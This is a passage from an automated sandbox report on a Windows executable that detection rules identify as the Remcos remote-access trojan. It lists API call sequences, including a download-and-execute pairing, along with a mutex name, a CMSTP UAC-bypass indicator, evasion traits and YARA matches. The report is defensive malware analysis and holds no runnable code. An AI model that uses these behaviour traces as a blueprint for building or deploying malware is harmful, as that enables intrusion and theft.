                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00426254 | 1_2_00426254
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00431377 | 1_2_00431377
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041E5DF | 1_2_0041E5DF
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0044C739 | 1_2_0044C739
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004267CB | 1_2_004267CB
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0043C9DD | 1_2_0043C9DD
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00432A49 | 1_2_00432A49
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0043CC0C | 1_2_0043CC0C
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00434D22 | 1_2_00434D22
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00426E73 | 1_2_00426E73
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00440E20 | 1_2_00440E20
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0043CE3B | 1_2_0043CE3B
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00412F45 | 1_2_00412F45
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00452F00 | 1_2_00452F00
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00426FAD | 1_2_00426FAD
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: String function: 00401F66 appears 50 times
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: String function: 004020E7 appears 41 times
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: String function: 004338A5 appears 42 times
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: String function: 00433FB0 appears 55 times
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 | reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants | Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 | reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/0@0/1
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError | 1_2_00416AB7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle | 1_2_0040E219
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource | 1_2_0041A63F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 1_2_00419BC4
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-4NJUM7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: Software\ | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: Rmc-4NJUM7 | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: Exe | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: Exe | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: Rmc-4NJUM7 | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: 0DG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: Inj | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: Inj | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: BG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: BG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: BG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: @CG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: BG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: exepath | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: @CG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: exepath | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: BG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: licence | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: `=G | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: XCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: dCG | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: Administrator | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: User | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: del | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: del | 1_2_0040D767
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Command line argument: del | 1_2_0040D767
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | ReversingLabs: Detection: 87%
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: winmm.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Section loaded: cryptbase.dll
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 1_2_0041BCE3
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_004567E0 push eax; ret | 1_2_004567FE
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00455EAF push ecx; ret | 1_2_00455EC2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00433FF6 push ecx; ret | 1_2_00434009
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00406128 ShellExecuteW,URLDownloadToFileW | 1_2_00406128
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 1_2_00419BC4
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Code function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 1_2_0041BCE3
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0040E54F Sleep,ExitProcess,1_2_0040E54F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,1_2_004198C2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Window / User API: threadDelayed 5142
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Window / User API: threadDelayed 4850
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe API coverage: 8.8 %
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe TID: 5500 Thread sleep count: 5142 > 30
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe TID: 5500 Thread sleep time: -15426000s >= -30000s
